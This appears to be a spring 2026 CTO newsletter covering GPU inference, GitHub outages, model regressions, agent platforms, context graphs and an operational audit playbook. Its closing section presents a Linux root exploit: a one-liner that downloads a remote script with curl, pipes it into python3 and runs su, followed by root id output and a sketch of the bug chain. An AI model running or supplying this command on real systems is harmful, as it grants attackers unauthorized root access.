CTO Lunch NYC🪻Spring 2026
Tech Roundup for CTOs, CAIOs and CDAOs
While NYC CTOs were sitting down for lunch together at a 117-year-old bar in Manhattan, Nvidia GTC (GPU Technology Conference) in San Jose (where the nearest CTO Lunch chapter is Norcal, which meets in SF) was wrapping up after an astounding 621 sessions across 3 languages, and Jensen Huang had just done his Vera Rubin victory lap in his trademark leather jacket (the kind you used to see everywhere in NYC and now only see on stages) for hardware that won't ship until Q4 at best, meaning 2027 if you're not AWS or Microsoft. And thirty thousand people gave him a standing ovation for a product announcement. (Well, a lot of them did.)
If you were lucky enough to have been in both places (honestly it's only luck if you score a whole row on the redeye back in time for lunch) you'd notice the same conversation taking place in both venues: namely, the realization that the stack is destabilizing at every layer simultaneously, with CTOs saying that most organizations are still acting as if that’s purely a procurement problem rather than an operational one.
You’re flying 2,500 miles to make it to a lunch where people are complaining about the exact same things you just heard in Silicon Valley.
Nearly coinciding with our last lunch, and 40 blocks away, a Vercel employee connected a third-party agent app to their corporate Google account and discovered (the hard way) exactly how much of enterprise security was built around the assumption that the person on the other end of the credential was a person.
From Jensen’s victory lap for an architecture that isn’t shipping yet to the Google Cloud Next keynote quietly declaring that the entire modern data stack was built for the wrong user; from GitHub’s growing fascination with service degradation to Anthropic’s moving all the furniture around when no one’s looking, to OpenAI’s product line changes and departures, to the surprising (or not so surprising) blast radius of a single Vercel employee connecting a single OAuth app to their corporate Google account; sideways seemed to be the preferred direction this quarter. (Well, not the S&P 500 and NASDAQ Composite, obvi.)
But none of these are unrelated incidents. They’re all dispatches from the same saga, and they share the same structural underpinnings. The emerging (agentic) stack is destabilizing and being destabilized at every layer simultaneously; infrastructure, models, governance, tooling, and the shared world models that hold all of it together.
IN THIS ISSUE
It’s Her (token) Factory
We Need to Talk about GitHub
Moving the Furniture in Real Time
The Enterprise Agentic Stack Arrives
Context is King (for a day)
RSC-y Business
Colapso
It’s Her (token) Factory
Last year we mapped the five-tier value chain of AI and noted that only Tier 1 was making real money. Each tier theoretically capturing margin by adding differentiation, one tier actually doing it, the rest playing hot potato as the model showed signs of becoming featurized while the infrastructure around it was becoming the business. But all that’s last year already; you were just apprised in advance.
Just 2 days before the aforementioned lunch, Jensen Huang stood on that stage in San Jose to kick off those astonishing 621 sessions (tbc: it was the number that was astonishing; a number of sessions were not necessarily so) and took his victory lap for Vera Rubin, which is not shipping yet.
What actually shipped was Magic Attention and Warp Specialized Attention. In essence, both are variants on the barnyard bromide “all tokens are equal but some are more equal than others.” Magic Attention routes compute dynamically based on token relevance, the silicon now sorting signal from noise at inference time rather than brute-forcing the whole context window. Warp Specialized Attention goes lower still, down to the 32-thread atomic unit of GPU execution, parallelizing the attention kernel itself (query, key, value, output all running concurrently) to not just push back, but structurally eliminate the memory tax every serious inference workload has to pay (the bandwidth bottleneck between GPU compute and GPU memory).
If the room understood what that meant, Jensen wouldn’t have needed the leather jacket. (There’s a reason NYC CTOs don’t really wear those anymore.)
What it means is this: the data center used to be a warehouse. You bought capacity, held it, served against it. Overprovision, autoscale, cache aggressively, pray your worst-case concurrency assumptions held. It’s how we’ve always done it. Inference breaks that abstraction at the foundation. Tokens enter as raw material. Inside the system they are culled, recombined, and amplified with highly uneven expenditure of compute. Most of the input is not preserved but consumed in the act of producing the output. The transformation is the product. What matters is not how much state you can hold but how efficiently you can drive that transformation under hard constraints: latency, bandwidth, power, cost, SLOs. Which is a factory dynamic, not a warehouse.
The data center used to be a place for files. It’s now a factory for tokens.
Historically, capacity planning assumed a relatively stable relationship between input and compute. That relationship is gone. Inference workloads are nonlinear, context-sensitive, and shaped by attention mechanisms your procurement team has never heard of and probably won’t understand. And the organizations still treating this as a warehouse problem, or procurement, still capacity planning, still autoscaling against static assumptions, are running factory economics through warehouse math.
Because the value has shifted (accordingly): not to whoever owns the largest static artifact, but to whoever runs the most efficient transformation pipeline across hardware, runtime and orchestration.
We Need to Talk about GitHub
To run efficient pipelines, though, you need stable infrastructure, so what exactly is going on over at GitHub these days? Just since our last newsletter they have averaged an incident per day, no cap. And if you showed me the shambolic status bars for Anthropic and GitHub side-by-side, I’d be hard pressed to even say which was which, tbh. A number of the GitHub incidents were high severity, and at least one was a CVSS 8.7 remote code execution.
It got so bad Mitchell Hashimoto started keeping a journal (Mitchell is GitHub user #1288, signed up in 2008; the year of my very first talk on Git + Mongo, FWIW.) He’s been logging incidents for months and the data is—as we say—brutal: 37 incidents in February; 28 in March; 23 in April. One Merge Queue bug silently reverted commits across 658 repositories and 2,092 PRs. April 28 brought CVE-2026-3854, CVSS 8.7, remote code execution in the internal git layer, with 88% of GitHub Enterprise Server instances still unpatched at last count. If you’ve been wondering whether the degradation you’ve been noticing is serious or exaggerated, he brought the receipts.
Zig migrated to Codeberg in December, which registered as a warning shot at the time and got filed away as one project’s idiosyncratic preference. I mean, it’s Zig, right? But Mitchell announcing Ghostty was following suit was the dam bursting.
The Copilot revenue story is genuinely good. The platform reliability story isn’t, and the two are arguably not coincidental.
But Microsoft is pouring its engineering attention into Copilot features while the underlying platform accrues the kind of (quiet) degradation that’s inappropriate for a product announcement and rarely makes it into any documentation surface at all. This concern has a particular weight right now because IaC has become the mandatory backbone for scaling AI systems and multi-cloud architectures, and the transition already underway is pushing it further toward autonomous, self-healing environments where policy and intent drive the architecture rather than static, human-written configuration.
Terraform (or Tofu, post-IBM acquisition) plans that a human reviews before applying are giving way to systems that continuously reconcile desired state with actual state. Less like an OODA loop and more like homeostasis. The more autonomy you push into the infrastructure layer, the more the platform running your pipelines, your repos, your CI/CD has to be something you can actually depend on.
GitHub degrading precisely as IaC matures toward autonomy is no coincidence, and it is a compounding problem with a compounding cost: the more your infrastructure drives itself, the more catastrophically it fails when the platform underneath it goes down.
Moving the Furniture in Real Time
The Gartner Hype Cycle has always been a useful fiction, but it used to at least hold still. It now feels less like a cycle and more like someone rearranging the furniture while you’re sitting on it. In the dark. While billing you for the privilege. CTOs aren’t the only ones tripping over it, but they’re the ones expected to explain the bruises at the next board meeting. Doubly so, if you’re fractional. At lunch, the conversation keeps circling back to the same uncomfortable realization: the capability you validated in Q1 is not the capability you’re running in Q2. And Q3 is days away.
Although Opus 4.6 (released Q1) didn’t draw the same vocal dissatisfaction from coders that it met with in the writing community, it actually regressed on SWE-Bench. Then Opus 4.7 arrived (same vendor, same product line, one release cycle) and drew the kind of vocal, sustained dissatisfaction that’s genuinely hard to achieve in a market that can’t stop praising everything (worse than the GPT-5 launch, impressive in the wrong direction!). It broke the foundational assumption most shops had bought into: that newer means better. Nope. Not predictably. Not reliably. Not structurally. Treating this as a fluke rather than a pattern is the more expensive mistake, btw.
The loyalty churn compounds this. One month Claude Code is your team’s golden goose. The next it’s nerfed and Codex is back. Tool loyalty in this space has more back-and-forth than the US Open final. And then there’s that one guy on the team who insists Gemini CLI is best, but never seems to be able to articulate why beyond personal preference. (The worst part is he might be right by the time this goes to print.) You thought you were standardizing on a tool; you were renting one mid-identity crisis.
None of this has a name yet, which ofc is part of the problem. Model (and harness) instability as an infrastructure risk class is real, consequential, and eating engineering hours across the industry, but it doesn’t have the vocabulary that would force it onto a risk register. It needs a line item in the workbook.
Your ersatz leading indicator is the quality of your engineers’ Slack complaints. (Because that’s obviously a lagging indicator.) More specifically: the proliferation of workarounds, the tool-switching that doesn’t go through approval, the browser extension shipped to another team to automate clicking “continue.” (We won’t talk about the JavaScript that got passed around to automate watching mandatory HR trainings.) When your team is scripting around vendor rate limits at that speed, you’re not reading a leading indicator, you’re already en route to a post-mortem.
The Stack Beneath the Model Is Also Moving
Stability is not a feature. It’s a tax you pay somewhere.
It’s not just model mayhem, although models are not as predictable as they once were (if you’ll forgive me the expression). The jump in token usage from 4.5 to 4.6 was noticeable, but then Opus 4.7 arrived with a near-quadrupling of token usage on identical prompts. This showed that an industry rule of thumb (that you could estimate cost from prompt structure, even as prompts were growing in cost) wasn’t nearly as reliable as previously thought. And it wasn’t thought to be so reliable to begin with. We’re back to guessing at quality, latency, and cost simultaneously.
Everything underneath is moving at the same time, and the regression surface is larger than most teams have mapped. At the SaaS product layer (Claude Code; Codex; Gemini CLI, I guess) you get model plus harness plus UX, bundled, with no meaningful changelog. You are effectively QA for a product you don’t control. Unpinned APIs offer maximum volatility with minimum warning; you’re opting into drift whether you know it or not. Pinned APIs give you fixed weights, but the surroundings (system prompts, safety filters, retrievers) are still fluctuating on vibes. Self-hosted open weights hand you the regression surface you always wanted: yours, entirely, to debug at 2am. (Congratulations. Hope you like kernels.) None of these options are clean; all of them are hiding costs somewhere.
Anthropic shipped approximately 50 updates in 52 days (impressive velocity or an admission of instability, depending on your blood pressure). Tool call limits dropped silently from roughly 80 per turn to somewhere between 10 and 20. Peak-hour throttling became normalized across all tiers, with dedicated sites now cataloging the outages. OpenAI’s version is more theatrical: A Sora announcement with considerable fanfare was followed by the entire project being killed the next day, the team blindsided, Disney finding out about the billion-dollar partnership cancellation with under an hour’s notice. The head of OpenAI for Science likewise making a huge product announcement the day before he drops his suspiciously effusive severance-compliant farewell. Three of their top execs announcing their unplanned departures late on a Friday with extremely polite goodbye posts doing a lot of legal work. The through-line is the same in both cases: if their own teams don’t have a stable roadmap, your own roadmap which includes them as a dependency is hitched to a runaway process.
Then there’s the irony nobody at lunch can quite stop laughing at. Dario Amodei is publicly arguing we no longer need programmers and we won’t need software engineers much longer. Meanwhile Anthropic can’t hold two nines of uptime. Maybe they don’t need software engineering; CTOs still do.
The honest answer on what to do fits in two points. Internal evals are the only signal you actually own: continuous, workload-specific, and running before you need them, not after. Open weights are the architectural escape hatch; real stability and real control in exchange for real infrastructure responsibility, and not as expensive as they used to be relative to what proprietary instability is now costing. And the calculus is moving fast enough that neither option is dismissible; both paths are unstable in different ways, both are improving rapidly, and choosing without acknowledging this is how you write the next case study. Or maybe yours will be a success story. (If you implement the recommended playbook, following.)
CTO Playbook: 30/60/90
Model Version Pinning Audit (HIGH PRIORITY - 30 days):
Enumerate all production LLM calls across services (grep codebase, inspect API gateways, trace outbound requests). Extract: provider, model name, version/snapshot, invocation path. Identify any calls without explicit snapshot pinning and any references to deprecated snapshots (e.g., 20250514). Replay a fixed prompt set (≥50 representative prompts) against current vs latest model versions to measure token count variance and output drift.
Measure: % unpinned calls, deprecated snapshot usage count, token delta distribution (p50/p95), output diff rate.
Deliverables: versioned model inventory (service → endpoint → model → snapshot), deprecation remediation list with owners, token cost variance report on fixed prompts, CI/CD rules to reject unpinned snapshots (backlog).
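The token delta distribution in that audit can be sketched in a few lines. This is a minimal illustration, not a reference implementation: it assumes you have already replayed the fixed prompt set against both model versions and collected one token count per prompt for each. The function name and the input shape are hypothetical.

```python
import statistics

def token_delta_report(baseline_tokens, candidate_tokens):
    """Compare per-prompt token counts from two model versions.

    Both arguments are lists of token counts, index-aligned by prompt
    (hypothetical input shape). Returns percentiles of candidate/baseline.
    """
    if len(baseline_tokens) != len(candidate_tokens):
        raise ValueError("token lists must cover the same prompts")
    if len(baseline_tokens) < 2:
        raise ValueError("need at least two prompts to compute percentiles")
    if any(b <= 0 for b in baseline_tokens):
        raise ValueError("baseline token counts must be positive")
    ratios = [c / b for b, c in zip(baseline_tokens, candidate_tokens)]
    # quantiles(n=100) returns 99 cut points: index 49 is p50, index 94 is p95
    cuts = statistics.quantiles(ratios, n=100, method="inclusive")
    return {"p50": cuts[49], "p95": cuts[94], "max": max(ratios)}

# Made-up counts for four prompts, purely for illustration
report = token_delta_report([100, 100, 100, 100], [100, 200, 300, 400])
```

A p95 ratio well above the p50 suggests a subset of prompts is driving the cost increase, which is usually more actionable than the average.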
OAuth Access Audit (HIGH PRIORITY - 30 days):
Query all OAuth integrations via admin APIs (Google Workspace, GitHub, Slack). For each app: pull scopes, install date, last access timestamp, associated users/services. Cross-reference with IAM to identify service accounts vs human users. Validate scope necessity against actual API usage logs. Revoke tokens for unused apps (>30 days inactivity) and any app without mapped owner.
Measure: total OAuth apps, % with unused scopes, % without owner, number of high-risk scopes (write/admin).
Deliverables: OAuth registry table (app_id → scopes → owner → last_used → risk_score), revocation log, list of over-scoped apps with required scope reductions, access review sign-off.
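As a rough sketch of the triage step, assuming the admin-API export has already been flattened into records with the registry columns above: the record shape, the function name, and the scope markers used to guess "high risk" are all illustrative assumptions, not any provider's API.

```python
from datetime import datetime, timedelta, timezone

# Hypothetical substrings used to flag write/admin scopes; tune per provider.
HIGH_RISK_MARKERS = ("admin", "write")

def triage_oauth_apps(apps, now, max_idle_days=30):
    """Flag OAuth apps for revocation or review.

    `apps` is a list of dicts with keys app_id, scopes, owner, last_used
    (timezone-aware datetime or None), mirroring the registry table.
    """
    cutoff = now - timedelta(days=max_idle_days)
    findings = []
    for app in apps:
        reasons = []
        if not app.get("owner"):
            reasons.append("no_owner")
        last_used = app.get("last_used")
        if last_used is None or last_used < cutoff:
            reasons.append("inactive")
        risky = [s for s in app.get("scopes", [])
                 if any(m in s.lower() for m in HIGH_RISK_MARKERS)]
        if risky:
            reasons.append("high_risk_scope")
        # Audit rule from the text: revoke if unused >30 days or unowned.
        if "no_owner" in reasons or "inactive" in reasons:
            action = "revoke"
        elif risky:
            action = "review"
        else:
            action = "keep"
        findings.append({"app_id": app["app_id"], "reasons": reasons, "action": action})
    return findings

now = datetime(2026, 5, 1, tzinfo=timezone.utc)
sample = [
    {"app_id": "a", "owner": "alice", "last_used": now - timedelta(days=5), "scopes": ["drive.readonly"]},
    {"app_id": "b", "owner": None, "last_used": now - timedelta(days=1), "scopes": []},
    {"app_id": "c", "owner": "bob", "last_used": now - timedelta(days=45), "scopes": []},
    {"app_id": "d", "owner": "carol", "last_used": now - timedelta(days=2), "scopes": ["admin.directory.user"]},
]
actions = {f["app_id"]: f["action"] for f in triage_oauth_apps(sample, now)}
```

Substring matching on scope names is crude; a real audit would map each provider's scope catalog to risk levels explicitly.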
GitHub Dependency Mapping (HIGH PRIORITY - 30 days):
Extract all GitHub-dependent workflows (Actions YAML, webhooks, Packages pulls, Pages deployments). Build dependency graph: service → workflow → GitHub feature. Chaos day: Simulate failure by disabling Actions in staging or blocking api.github.com egress. Record pipeline failures, deployment blocks, artifact fetch errors.
Measure: number of critical workflows dependent on Actions, mean time to failure under outage simulation, % of pipelines without fallback.
Deliverables: dependency graph (DAG format), outage impact matrix (workflow → failure mode → severity), list of single points of failure, remediation backlog (mirror, cache, or decouple).
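One way to bootstrap the service → workflow → GitHub feature graph is a plain text scan of workflow files. The sketch below is heuristic and assumes workflows are already loaded as strings. The feature labels and the host strings used to detect Packages and API usage are assumptions to adapt, and a YAML parser would be more robust than a regex.

```python
import re
from collections import defaultdict

# Matches `uses: owner/repo@ref` steps in GitHub Actions workflow YAML.
USES_RE = re.compile(r"^\s*(?:-\s*)?uses:\s*([^\s#]+)", re.MULTILINE)

def github_features(workflow_text):
    """Guess which GitHub features a workflow depends on (heuristic)."""
    features = set()
    if USES_RE.search(workflow_text):
        features.add("actions")
    if "ghcr.io" in workflow_text or "npm.pkg.github.com" in workflow_text:
        features.add("packages")
    if "api.github.com" in workflow_text:
        features.add("api")
    return features

def build_graph(workflows):
    """workflows: dict mapping (service, workflow_name) -> YAML text."""
    graph = defaultdict(dict)
    for (service, name), text in workflows.items():
        graph[service][name] = sorted(github_features(text))
    return dict(graph)

example = (
    "jobs:\n"
    "  build:\n"
    "    steps:\n"
    "      - uses: actions/checkout@v4\n"
    "      - run: docker pull ghcr.io/acme/base:1\n"
)
graph = build_graph({("web", "ci.yml"): example})
```

The resulting dict is a starting point for the outage impact matrix: each feature listed for a workflow is a candidate failure mode to exercise on the chaos day.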
Continuous Evaluation System (MEDIUM PRIORITY - 60 days):
Reference implementation: Continuous Evaluation with Harbor
Implement continuous evals for Prod LLM and agent workflows using Harbor as execution layer. Goal: run ongoing, reproducible evaluations on real production traces to detect model drift, agent degradation, and tool-use failures. Sampling, dataset construction, evaluation execution, and CI-triggered runs should follow the Harbor continuous eval workflow.
Measure: pass/fail rate per workflow, semantic drift vs baseline, output variance %, agent tool-use success rate.
Deliverables: Harbor-based continuous evaluation system, versioned production trace datasets per workflow, CI-triggered evaluation runs, regression dashboard across model and agent performance, rollback thresholds tied to observed regression.
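The rollback threshold itself is independent of the execution layer. The sketch below does not use Harbor's API. It assumes only that each eval run yields a pass/fail result per trace, grouped by workflow. The function name, input shapes, and the 5-point default threshold are illustrative assumptions.

```python
def regression_check(baselines, results, max_drop=0.05):
    """Decide per workflow whether observed regression crosses the threshold.

    baselines: dict workflow -> baseline pass rate (0.0 to 1.0)
    results:   dict workflow -> list of booleans (True = trace passed)
    """
    report = {}
    for workflow, outcomes in results.items():
        if not outcomes:
            raise ValueError(f"no eval results for {workflow}")
        pass_rate = sum(outcomes) / len(outcomes)
        drop = baselines[workflow] - pass_rate
        report[workflow] = {
            "pass_rate": pass_rate,
            "drop": drop,
            # Rollback only when the drop exceeds the agreed tolerance
            "rollback": drop > max_drop,
        }
    return report

# Made-up numbers for illustration
report = regression_check(
    {"triage": 0.9, "summarize": 0.9},
    {"triage": [True] * 8 + [False] * 2, "summarize": [True] * 9 + [False]},
)
```

With small trace samples the pass rate is noisy, so the threshold is worth pairing with a minimum sample size before it is allowed to trigger anything.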
Repository Failover (MEDIUM PRIORITY - 60 days):
Set up secondary Git host. Mirror repositories using scheduled sync. Replicate access controls and deploy keys. Reconfigure CI pipelines to support alternate git remote. Execute controlled failover: switch origin, trigger build, validate artifact production and deployment.
Measure: sync lag (seconds), failover time (minutes), % pipelines passing post-failover.
Deliverables: mirrored repos with sync automation, documented failover runbook, successful failover test logs, rollback procedure.
Pipeline Monitoring Decoupling (MEDIUM PRIORITY - 60 days):
Implement external monitoring (e.g., cron-based or event-driven) to poll pipeline endpoints and artifact availability independent of GitHub. Inject synthetic transactions (trigger builds, verify completion via API). Route alerts through independent channel (PagerDuty, etc.). Simulate GitHub outage by blocking API access and confirm alert triggers.
Measure: alert latency under failure, % pipelines with coverage, false negative rate in simulation.
Deliverables: monitoring service with coverage map (pipeline → monitor), alerting config, outage simulation report with detected vs missed failures.
Model API Stability Policy (QUARTERLY OKR - 90 days):
Define enforcement rules: all model calls must include explicit snapshot/version; fallback chains must be explicit and logged. Implement static analysis (lint rule or CI check) to reject unpinned model usage. Add runtime logging for model selection, fallback invocation, and version drift. Schedule review cadence aligned to vendor release cycles.
Measure: % compliance with pinning policy, number of fallback events per week, time-to-detect version drift.
Deliverables: policy document, linting/CI enforcement rules, logging schema for model usage, weekly drift report.
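A CI check for the pinning rule can start as a simple text scan. The sketch below assumes model identifiers appear as string literals next to a `model` key or keyword argument, and that a pinned identifier ends in an 8-digit date snapshot such as 20250514. Both are conventions to verify against your own providers, and the model names are placeholders.

```python
import re

# Assumption: model names appear as model="..." or "model": "..." literals.
MODEL_RE = re.compile(r"""model["']?\s*[=:]\s*["']([^"']+)["']""")
# Assumption: a pinned identifier ends in an 8-digit date snapshot.
SNAPSHOT_RE = re.compile(r"-\d{8}$")

def find_unpinned(source_text):
    """Return (line_number, model_name) for model strings lacking a snapshot."""
    hits = []
    for lineno, line in enumerate(source_text.splitlines(), start=1):
        for name in MODEL_RE.findall(line):
            if not SNAPSHOT_RE.search(name):
                hits.append((lineno, name))
    return hits

# Placeholder model names, not real identifiers
sample_source = (
    'client.call(model="example-model-20250514")\n'
    'client.call(model="example-model-latest")\n'
    'cfg = {"model": "example-model"}\n'
)
violations = find_unpinned(sample_source)
```

In CI, a non-empty result would fail the build. Model names assembled at runtime will slip past a static scan, which is why the policy also calls for runtime logging of model selection.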
GitOps Host Abstraction Assessment (QUARTERLY OKR - 90 days):
Audit deployment system (Flux/ArgoCD/etc.) for hardcoded GitHub dependencies (URLs, auth, webhook triggers). Test multi-source configuration with secondary Git host. Attempt full environment sync from non-GitHub source. Identify blockers (auth, tooling assumptions, pipeline coupling).
Measure: % of workloads deployable from alternate host, number of GitHub-specific dependencies, time to switch source.
Deliverables: architecture assessment (component → dependency), list of GitHub-coupled elements, implementation plan to achieve host abstraction.
Open Weights Evaluation (QUARTERLY OKR - 90 days):
Select candidate open-weight models. Deploy locally or in VPC. Run same eval dataset as API models. Measure inference latency (cold/warm), throughput (req/s), infra cost (GPU hours), and output quality vs baseline. Test operational constraints: scaling, failure recovery, model reload times.
Measure: cost per 1K requests, latency p50/p95, output quality delta vs API baseline, ops overhead (engineer hours/week).
Deliverable: benchmark report (API vs open-weight), infra cost model, performance comparison charts, recommendation on scope of adoption.
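The headline numbers for that benchmark report reduce to a little arithmetic. This is a sketch under stated assumptions: latencies are per-request samples in milliseconds, and infra cost is GPU hours multiplied by an hourly rate. The function name and all input figures are made up for illustration.

```python
import statistics

def benchmark_summary(latencies_ms, gpu_hours, gpu_hourly_cost, requests):
    """Summarize one benchmark run for an API-vs-open-weight comparison."""
    if requests <= 0:
        raise ValueError("requests must be positive")
    # quantiles(n=100) returns 99 cut points: index 49 is p50, index 94 is p95
    cuts = statistics.quantiles(latencies_ms, n=100, method="inclusive")
    total_cost = gpu_hours * gpu_hourly_cost
    return {
        "latency_p50_ms": cuts[49],
        "latency_p95_ms": cuts[94],
        "cost_per_1k_requests": total_cost / requests * 1000,
    }

# Illustrative inputs only
summary = benchmark_summary(
    latencies_ms=[100, 200, 300, 400, 500],
    gpu_hours=10,
    gpu_hourly_cost=2.0,
    requests=4000,
)
```

Running the same function over the API baseline's latency samples and billed cost gives a like-for-like row for the comparison table. Ops overhead in engineer hours has to be tracked separately.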
Enterprise Agentic Stack Arrives (which one?)
“We’re no longer thinking about human personas like data scientists.
We’re thinking about agents as the persona.”
We’ve talked before about the collapse of the modern data stack. It’s now collapsing from an entirely new pressure, or rather the same source previously identified, now felt at production scale. The entire modern data stack, dbt, Fivetran, the warehouse underneath it, the BI layer on top, was architected around human-paced consumption, the assumption that the user is a human that’s baked into every abstraction layer in the stack. While it may seem obvious that, if agents are the user class now, that’s a lot of infrastructure built for the wrong person, why did it take someone saying this from a big enough stage—last week at Google Cloud Next in Las Vegas—for enterprise architects to respond? That’s a rhetorical question, obvi.
Gemini Enterprise Agent Platform (GEAP‽) is Google’s theory of where the response goes: Agent Studio, Agent-to-Agent Orchestration, Agent Registry, Agent Identity, Agent Gateway, Agent Observability. Agent Identity. Their naming as fun and un-subtle as ever. But notice what’s sitting inside that stack: Agent-to-Agent Orchestration isn’t a proprietary Google feature. It’s built on A2A, the Agent-to-Agent Protocol that Google originated and then donated to the Linux Foundation, which just hit its one-year mark with over 150 supporting organizations (incl. AWS, Microsoft, Cisco, IBM, Salesforce, SAP, and ServiceNow) with production deployments across supply chain, financial services, insurance, and IT operations. Microsoft has embedded it in Azure AI Foundry and Copilot Studio. AWS shipped support through Bedrock AgentCore Runtime. This isn’t a Google platform. This is a standards moment, and it happened while everyone was watching the cloud keynotes.
A2A/MCP pairing is a sharper way to see the stack taking shape. A2A defines how agents communicate and coordinate across organizational boundaries. MCP, also now a Linux Foundation project, defines how agents connect to internal tools and data sources. Together they form a two-layer foundation for multi-agent systems that don't require a single-vendor approach. The interoperability problem, the one that was going to generate years of proprietary lock-in fights, has a potential answer.
Google's bet, on top of that foundation, is that governance has to be enforced before an agent touches anything, at the control plane, below the application layer, the same way IAM is enforced before a human touches anything, with observability and policy baked in. By the time an agent is inside your application boundary, in this theory, the governance window has already closed. Their 8th gen TPU inference pod (1,152 TPUs, 3x on-chip SRAM, built to run millions of agents concurrently) is the hardware for the world this theory requires.
The same week Google announced Agent Identity as a foundational infrastructure primitive, Vercel shipped Next.js 16.2 and called it “agent-native.”
Vercel’s theory is that the application layer is where agent intelligence should live, embedded in runtime context, version-matched documentation, and direct application observability, rather than governed from infrastructure below. The agent doesn’t need an identity primitive if it never leaves the application boundary.
Next.js 16.2 ships AGENTS.md into every new project: a file that redirects agents from stale training data to version-matched documentation bundled directly in node_modules. Vercel ran the evals. AGENTS.md hit 100% on Next.js tasks. Skills-based approaches maxed out at 79%, because skills require the agent to recognize when to invoke them, and in 56% of eval cases it didn’t. Always-available context beats on-demand retrieval, which is a finding with implications well beyond Next.js. next-browser goes further: terminal access to a running application, screenshots, network requests, console logs, React component trees, all returned as structured text an agent can reason about without touching a browser UI. The agent sees what the application is doing in real time.
Which one of these visions is right about where agents actually live and who governs them? Vercel is building from the application layer down: AGENTS.md plus bundled docs that make your agent an expert in the exact version of Next.js it’s running, a purpose-built browser tool for frontend debugging and optimization, a framework that treats the agent as a first-class runtime citizen. (Mitchell Hashimoto, fresh from keeping GitHub’s incident journal, just joined the Vercel board. The open source infrastructure world is quietly reorganizing around a specific architectural thesis, and that’s where he placed his marker.)
Google's answer to that question is that the application layer is too late. Agent Identity in the Gemini stack isn't a feature you bolt on after deployment, it's a primitive, enforced at the control plane before an agent is permitted to act; the same way IAM governs humans before they touch anything. Agents in this model are credentialed, scoped, and auditable from the infrastructure layer up. The six-product announcement (Studio, Orchestration, Registry, Identity, Gateway, Observability) is not a product suite. It's a governance stack, and the sequence is deliberate: you don't get to Orchestration without Identity, you don't get to Observability without Gateway.
Google is arguing that the blast radius of an ungoverned agent isn't an application problem. It's an infrastructure problem, and infrastructure problems require infrastructure solutions. A2A v1.0 ships Signed Agent Cards, cryptographic identity verification baked into the protocol itself, which is as explicit as a spec gets about where the project thinks identity has to live.
Then the Context AI incident happened, and the debate got a lot more concrete.
A Vercel employee downloaded a third-party agent app, connected it to their corporate Google account via OAuth, and the chain unraveled. Account takeover. Internal system access. Unencrypted credentials exposed. Context AI, for its part, did its best to treat this as a footnote.
The only irony is structural. Agent Identity, the piece Google announced as a foundational infrastructure primitive and the piece the broader A2A ecosystem just shipped a cryptographic answer for, is the hardest unsolved deployment problem in the agentic stack, and here is exactly what it looks like when it fails in the wild. At the company that shipped AGENTS.md. Against a protocol that had the answer in the spec. It just didn’t make it into the deployment.
Google is probably right that Agent Identity needs to be solved at the infrastructure layer. The industry just ratified Google's bet in the form of an open standard. Vercel just ran the proof of concept for why it matters. The question for every CTO in the room is which failure mode you're currently exposed to, and whether you've priced it. That's the work Agentic Reliability Engineering (ARE), if we're naming the discipline, actually does.
Context is King (for a day)
Context Engineering isn’t a discipline. It’s a symptom.
We used to treat context as something systems carried. That day is gone. The interesting question is why context is king, and the answer is less flattering than the royal sloganeering implies. Context is king because it forgets. Every agent session starts from nothing, no memory of last Tuesday's decision, no awareness of the exception carved out in February, no institutional knowledge of any kind. The context window is finite, ephemeral, and when the session ends, the kingdom falls. You rebuild it tomorrow. Context is king for a day because that's all the reign it gets.
The reason this is even possible to say out loud, the reason context and meaning are so tightly coupled that losing one destroys the other, traces back to Zellig Harris and the distributional hypothesis: meaning is literally a function of context, not a property of tokens. That's the insight that made all of modern NLP possible, and it's also the source of the problem. If meaning is context-dependent all the way down, then systems that drop their context don't just forget. They become incoherent.
This is what's underneath the term "context engineering" that's been circulating lately. It's not a discipline. It's a symptom. It's what software architecture looks like when the model is the runtime, amnesia is a default system behavior, and the response is to hire someone to manage the forgetting more carefully. Every layer of abstraction eventually collapses under the weight of implicit state. We've been here before. We just called it state management, and we had better tooling for it.
If you liked configuration drift, you're gonna love context drift.
Context drift is the actual enemy, and none of the current standard-issue responses actually fight it. Prompt engineering is muscle memory for a problem that has moved on. RAG pipelines are transitional fossils — useful, not sufficient. Carefully curated embeddings are a partial answer to a question that keeps getting bigger. None of them solve the core problem: every tool call, every intermediate step, every partial output introduces entropy into the system's understanding of what's going on. The more agents you add, the less predictable the system becomes — not because the models are worse, but because the shared world model is dissolving.
Neo4j Labs shipped uvx create-context-graph earlier this year, and Context Hub (chub) is the delivery vehicle that lets agents build and query a local context graph: persistent, local-first, queryable. The mechanical description is accurate and misses the point entirely. What chub is actually doing is operationalizing something the industry has been hand-waving for months: context isn't a prompt, it's a topology. Agents aren’t the recipients of context; they traverse it, mutate it, and occasionally corrupt it. CLI scaffolding is support for the moment the pattern morphs from whitepaper to make install. (We moved from CRA to Vite, and then from Vite to turbopack. It keeps getting faster.) What React did for front-end state, this is trying to do for agent cognition, but without the luxury of pretending the state is local, ephemeral, or internally consistent.
The next generation of systems won't be defined by how they process tokens,
but by how they stabilize context across time.
This is the shift from stateless intelligence to stateful coherence, and it represents an architectural inversion that hasn't fully landed yet. The old model: models at the core, data as input, context as wrapper. Call it MDC. The emerging model inverts it: context as core, data as one of many context sources, models as interchangeable operators. (CDM) The model isn't the thing anymore. The context layer is. At the upper echelons of enterprise, where the word travels more slowly, the realization is arriving that competitive advantage isn't about having the best fine-tuned model. It's about building, maintaining, and querying a high-fidelity context layer. Which, if you're keeping score, is basically a speedrun of the "it's the data, not the models" revelation from the MLOps era. History doesn't repeat, but it does maintain a context graph.
The master/emissary phenomenon we've talked about before applies here with particular force: capability has scaled faster than coherence, which means you have ambiguity operating at two distinct levels simultaneously; in the latent space of the models and in the shared world model dissolving across agents. Are you starting to see why there's a billion dollars pointing at the world model problem? Are you starting to get the sense of just how fast that train is moving, based purely on the singular convergence of attention across the top tech corridors — everyone talking about the same thing without quite knowing it, united in opposition to system entropy? Context graphs are the first serious attempt to fight that entropy at the architectural level. Not a passing of the crown. 👑 A regime change from within.
❝ Take away the context and the meaning also disappears. When you perceive intelligently… you always perceive a function, never an object in the set-theoretic or physical sense. ❞
— Stanislaw Ulam, quoted by Gian-Carlo Rota in ‘Indiscreet Thoughts’
RSC-y Business
The security perimeter was always a fiction maintained by the friction of human operations.
Let’s talk about copy fail. [https://copy.fail/#exploit] Or, actually, let’s just run it:
% curl https://copy.fail/exp | python3 && su
% id
uid=0(root) gid=1002(user) groups=1002(user)
This works on every Linux distro since 2017. It’s 732 bytes. No race window. No kernel offset. One logic bug in authencesn, chained through AF_ALG and splice() into a 4-byte page-cache write. All it takes is an unprivileged local account and one Python script.
